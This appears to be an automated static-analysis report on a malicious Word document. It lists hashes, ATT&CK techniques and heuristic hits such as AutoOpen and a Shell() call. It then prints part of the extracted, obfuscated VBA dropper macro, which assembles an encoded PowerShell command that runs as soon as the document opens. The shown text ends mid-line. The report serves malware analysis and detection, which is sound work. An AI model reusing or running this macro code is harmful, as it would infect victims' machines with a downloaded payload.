Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6efb24b952985dc…

MALICIOUS

Office (OLE)

Size: 219.5 KB | Created: 2018-06-26 19:18:00 | Authoring application: Microsoft Office Word | First seen: 2019-05-31
MD5: 3873f5c77a4b4b9bae5cacffb068b350
SHA-1: 08d7a71e9b56ed2d9add12db291fa81df62b4667
SHA-256: e6efb24b952985dc741afdf51ac70bbe51eaddd5665cf063e4513d8c20fcd61c
Risk Score: 242

Malware Insights

MITRE ATT&CK
T1059.005 (Visual Basic); T1204.002 (Malicious File)

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, so the macro runs as soon as the document is opened. The macro uses the Shell() function to execute a command, likely to download and run a second-stage payload. The reconstructed command string suggests an attempt to execute a downloaded file.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6592390-0 (critical) [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-6592390-0
  • VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA (critical) [OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro (high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9713 bytes
SHA-256: 37729ef9342e257da81b29f7d50cf74f34ad872c0e03a859034c6d249cc4d915
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "UwkKPFlwiZD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NoiwmlVDIzU"
Function kGwiHD()
On Error Resume Next
irzTt = 16989
riCOk = nqPTQG
HDAjwn = Sin(53472)
BwmfS = 2928
WfBUv = CDate(20143)
zYXDJT = 75748
jzMvLHw = "Hell" + "  . " + Chr(40) + " $SHE" + "llId[1" + "]" + Chr(43) + "$S" + "heLL" + "iD[13]" + Chr(43) + "'X'" + Chr(41) + Chr(40)
pfFXa = 28330
OkSSYW = 41110
TnIYT = CDate(50683)
aubha = Sin(55561)
RZNzq = 19085
akQLfD = vXwiuf
iIqqqS = Chr(34) + " $" + Chr(40) + " sE" + "T-varIAB" + "Le  'OFs" + "' '" + "' " + Chr(41) + Chr(34) + Chr(43) + "[st"
FlAiX = 50348
zBHNFK = 96845
pZpPUz = CDate(55103)
nMSTj = Sin(22431)
fKADv = 18370
nEBsLI = qziMi
MYnirwTT = "RING]" + Chr(40) + "'114W7O3" + "8i24E1" + "07" + "J56-51" + ">3" + "3O12" + "3W" + "57O52"
ZLllLD = 58921
PswdKL = 64571
HhivY = CDate(411)
RJwIIY = Sin(87250)
qqAnp = 70926
ZMbiIu = oQwGD
vTUrzJRSXIB = "X60-5" + "1U53J34" + ">118>24>" + "51Z3" + "4E1" + "20i1O5" + "1O5" + "2Z21U58U"
VqZEKS = 74445
HAwuM = 42886
zQLJK = CDate(71982)
JOlaW = Sin(59888)
qwfQIX = 84100
ArzPj = bqSJM
ibQHrpj = "63>51Z56" + "Z34O" + "109Z11" + "4Z33-2" + "9X0X107X" + "113-62i" + "34X34X38" + "W108E12" + "1U121U"
qMlMdr = 40208
bjipr = 11094
ktnpj = CDate(79293)
TfwuA = Sin(87)
iiDMz = 18987
irnhwM = borrB
rvQUwrocOjN = "33X3" + "3O33" + "U120Z" + "50Z51W51" + ">44" + ">55W5" + "5U35J34W" + "57X12" + "0-5" + "3W5" + "7i5"
oXRSkP = 27472
rwrBzr = 75537
hHoEL = CDate(16046)
PurnbZ = Sin(18656)
zIQZtL = 71935
DXllSJ = obhmGB
qjBEdVKvoRN = "9O121O27" + "X59" + "Z57" + "i44" + "O14J3" + "0J" + "26E57"
jbsjUb = 67797
rOOUS = 75309
vUCht = CDate(78746)
wAfQRj = Sin(59908)
TrDijr = 23278
WsHXc = sPkDi
dENEaV = "W48Z" + "121U2" + "2>6" + "2W34J" + "34W38>" + "108" + "X121Z121" + "J3" + "3X33Z33X"
EBdqFU = 24951
OFmQlM = 87154
iSQHB = CDate(72507)
jGAGMl = Sin(54721)
zQFii = 99513
NhzPX = JXfQn
wVfTYOPDTnS = "120E55" + ">37J55" + "Z63W32" + "i5" + "5O59W1" + "20J5"
WRFudw = 28734
iJaIm = 76464
OlrDTG = CDate(3315)
ocjWAR = Sin(89483)
wUErj = 5855
FsbuY = cQlXUd
cOYovHzHZo = "3U" + "57O59>1" + "21" + "E17J3" + "3U58>" + "59X5" + "3O10" + "1E48>1O3"
jhIjsI = 59700
ULWju = 79568
oGjJaB = CDate(56848)
YXBfz = Sin(94973)
iTwwp = 40288
qLLNln = NVEnnB
WJkTwm = "Z12E121-" + "22W62J34" + "Z34U" + "38" + "W108O121" + "X121J33" + "-3" + "3X33U" + "120"
kGwiHD = jzMvLHw + iIqqqS + MYnirwTT + vTUrzJRSXIB + ibQHrpj + rvQUwrocOjN + qjBEdVKvoRN + dENEaV + wVfTYOPDTnS + cOYovHzHZo + WJkTwm
PTOdiN = 94341
DIpEVf = 9406
cXzsP = CDate(26109)
LmvbNs = Sin(35263)
aUnnAE = 57422
INpUI = OQvSap
End Function
Function FjwBlhZOtj()
On Error Resume Next
bojMK = 46776
jiOlKp = 64607
sKZGvP = CDate(20802)
RrSKmZ = Sin(25364)
whMZMM = 23892
MisUi = BhHmki
lpBjEwt = "J53O55W5" + "3E6" + "2O63W3" + "7>5" + "0i63" + "E49Z63>" + "34J55-" + "58Z1" + "20" + "i5" + "3W57i" + "59-"
hdbza = 95931
RXzGRi = 86000
LLDzpt = CDate(32350)
lPZTpz = Sin(37909)
QbjjWE = 84157
VqzNB = uVjphq
qZEttjUUiY = "121i97O" + "59J21J" + "28J" + "21-57i" + "23X33X" + "2i" + "121J" + "22" + ">62Z34J3" + "4Z38E" + "108"
YPqKj = 39132
XFTDH = 90147
OmsEZh = CDate(63005)
GOhCR = Sin(68285)
buKXK = 35709
vFDEPQ = iaDmua
WDOilOp = "E121J121" + "O33X3" + "3Z33" + "U120i" + "52O" + "57" + ">50-47E1" + "23Z5" + "9>55X37" + "W37"
uCwqFB = 19067
MVjdq = 58032
bdrJKD = CDate(87321)
AHYTMJ = Sin(93982)
TazhN = 47386
GZZaT = shEwT
skTimtptQ = "J55-4" + "9O51W12" + "0E53-57" + "W59W120i" + "35" + "i55W121"
zbNIQ = 48792
IllKbU = 88151
TlQGw = CDate(40740)
GzQia = Sin(78462)
lhTFa = 29263
VAbsq = GrMBVK
McfUJP = "i0Z111-3" + "2W18" + "J3" + "3X99Z" + "21X1" + "00U101E" + "121Z22X" + "62" + "U34W" + "34-" + "38O10"
fHptIC = 27230
MlmjwF = 33904
vcSAdd = CDate(80892)
LSMmQw = Sin(66989)
uUYYVF =
... (truncated)